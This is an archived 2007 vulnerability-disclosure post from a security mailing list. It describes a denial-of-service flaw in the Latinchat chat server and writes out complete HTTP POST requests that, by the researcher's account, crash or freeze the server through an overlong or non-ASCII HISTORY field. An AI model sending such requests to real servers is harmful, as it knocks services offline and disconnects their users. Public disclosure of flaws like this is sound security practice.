Today this vulnerability keeps on existing in latinchat but with certain difference.Instead of request: POST /JAVA HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) Referer: http://www.disp004-org.latinchat.com Content-length: 142 UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R34_3-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999 the user is sending other request using ASCII characters, for example : POST /JAVA HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) Referer: http://www.disp004-org.latinchat.com Content-length: 142 UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R34_3-1&HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø± by sending this request to the server, it will crash. Another request that freezes the server has following aspect: POST /IN HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) Referer: http://www.disp004-org.latinchat.com Content-length: 142 using this request the attacker can boot certain quantity of users at the same time and the server remains frozen until the attacker does not stop process of attack.And in this case it does not have a lot of importance that we are going to put in variable of history :HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø± or HISTORY=999999999999999999999999999999999999999999999999999999999999999999999999999 the result will be the same Researcher: Vitto Makarsky (d4rkv1rus) -- View this message in context: http://www.nabble.com/Latinchat-Denial-Of-Service-tf2082367.html#a9890343 Sent from the Vulnerability - VulnWatch mailing list archive at Nabble.com.
This archive was generated by hypermail 2.1.3 : Sun Apr 08 2007 - 12:58:48 PDT